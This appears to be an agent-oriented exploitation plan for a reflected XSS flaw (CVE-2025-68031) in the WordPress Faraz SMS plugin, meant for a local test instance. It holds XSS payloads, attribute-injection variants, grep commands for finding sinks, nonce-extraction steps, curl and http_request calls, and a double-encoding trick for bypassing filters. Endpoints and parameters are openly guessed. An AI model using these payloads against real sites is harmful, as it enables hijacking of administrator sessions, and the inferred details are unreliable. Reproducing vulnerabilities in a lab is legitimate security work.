افزونه پیامک حرفه ای فراز اس ام اس <= 2.7.3 - Reflected Cross-Site Scripting

This research plan targets CVE-2025-68031, a Reflected Cross-Site Scripting (XSS) vulnerability in the افزونه پیامک حرفه ای فراز اس ام اس (farazsms) plugin. Since the source code is not provided, this plan relies on common patterns in this plugin's architecture and standard WordPress XSS sinks.

---

1. Vulnerability Summary

The "Faraz SMS" plugin for WordPress fails to sufficiently sanitize and escape user-supplied input before reflecting it back into the web page. This allows an unauthenticated attacker to craft a malicious URL containing a JavaScript payload. When a victim (especially an authenticated administrator) clicks the link, the script executes in their browser context.

2. Attack Vector Analysis

• Endpoint: Likely a frontend page where the plugin processes SMS subscription results, or a specific admin-ajax handler that returns HTML.
• Vulnerable Parameter: Likely a feedback or status parameter such as message, msg, fsms_status, or phone (inferred).
• Authentication: None (Unauthenticated).
• Preconditions: The victim must be tricked into clicking a specially crafted link. If the reflection occurs on an admin page, the victim must be logged in as an administrator.

3. Code Flow (Inferred)

1. Entry Point: A request is made to a URL containing a specific query parameter (e.g., wp-admin/admin.php?page=farazsms_settings&message=... or a frontend page like ?fsms_result=...).
2. Processing: The plugin's initialization logic (hooked to init or admin_init) or a specific page callback retrieves the parameter using $_GET or $_REQUEST.
3. Sink: The code calls echo or printf on the raw parameter without applying esc_html(), esc_attr(), or wp_kses().
   • Example Vulnerable Pattern: echo '<div class="updated"><p>' . $_GET['message'] . '</p></div>';

4. Nonce Acquisition Strategy

Reflected XSS via GET parameters typically occurs before or independently of nonce checks. However, if the reflection occurs within an AJAX response or a form submission that does require a nonce, use the following strategy:

1. Identify Shortcodes: Search for plugin shortcodes:
   grep -r "add_shortcode" /var/www/html/wp-content/plugins/farazsms/
   (Commonly [farazsms_newsletter] or [farazsms_verification]).
2. Create Setup Page: Create a page containing the found shortcode:
   wp post create --post_type=page --post_status=publish --post_content='[SHORTCODE_NAME]'
3. Extract Nonce:
   • Navigate to the newly created page.
   • Use browser_eval to find the localization object.
   • Look for variables like window.farazsms_ajax?.nonce or window.fsms_obj?.ajax_nonce.

5. Exploitation Strategy

The goal is to find a reflected parameter and execute alert(document.domain).

Step 1: Discovery (Grep for Sinks)

Run these commands in the plugin directory to find the exact vulnerable line:

# Search for raw echoes of GET/REQUEST parameters
grep -rP "echo\s+\\\$_(GET|REQUEST)" /var/www/html/wp-content/plugins/farazsms/
grep -rP "printf\(.*\\\$_(GET|REQUEST)" /var/www/html/wp-content/plugins/farazsms/

Step 2: Payload Construction

Based on the discovery, construct a URL. If the sink is inside an HTML tag attribute, use:
"><script>alert(document.domain)</script>
If the sink is inside a <div> or <p>, use:
<script>alert(document.domain)</script>

Step 3: Request Execution

Use the http_request tool to simulate a victim clicking the link.

• Method: GET
• URL: http://localhost:8080/[VULNERABLE_PAGE]?[VULNERABLE_PARAM]=%3Cscript%3Ealert(document.domain)%3C/script%3E

6. Test Data Setup

1. Install Plugin: Ensure farazsms version <= 2.7.3 is installed and active.
2. Configuration: Some XSS reflections only occur if certain settings are enabled (e.g., "Show success message after subscription").
3. Create Victim User:
   wp user create victim victim@example.com --role=administrator --user_pass=password

7. Expected Results

• The HTTP response body must contain the literal, unescaped string <script>alert(document.domain)</script>.
• If using browser_navigate, the browser should trigger an alert dialog (observable via console logs or screenshots).

8. Verification Steps

1. Source Verification:
   curl -s "http://localhost:8080/?vulnerable_param=<script>alert(1)</script>" | grep "<script>alert(1)</script>"
2. Context Check: Verify if the script is reflected inside a sensitive area (like the WordPress Admin Dashboard) which would allow for session hijacking or unauthorized administrative actions.

9. Alternative Approaches

• Attribute Injection: If the input is reflected inside an attribute (e.g., <input value="[INPUT]">), try:
  " onmouseover="alert(1)" or " autofocus onfocus="alert(1)"
• Admin-Ajax Reflection: Check if admin-ajax.php actions reflect input in their error/success responses:

  # Example (inferred)
  http_request(
      method="POST",
      url="http://localhost:8080/wp-admin/admin-ajax.php",
      body="action=farazsms_test&msg=<script>alert(1)</script>",
      headers={"Content-Type": "application/x-www-form-urlencoded"}
  )
  

• Double Encoding: If a simple payload is blocked, try URL-encoding the payload twice to bypass basic security filters.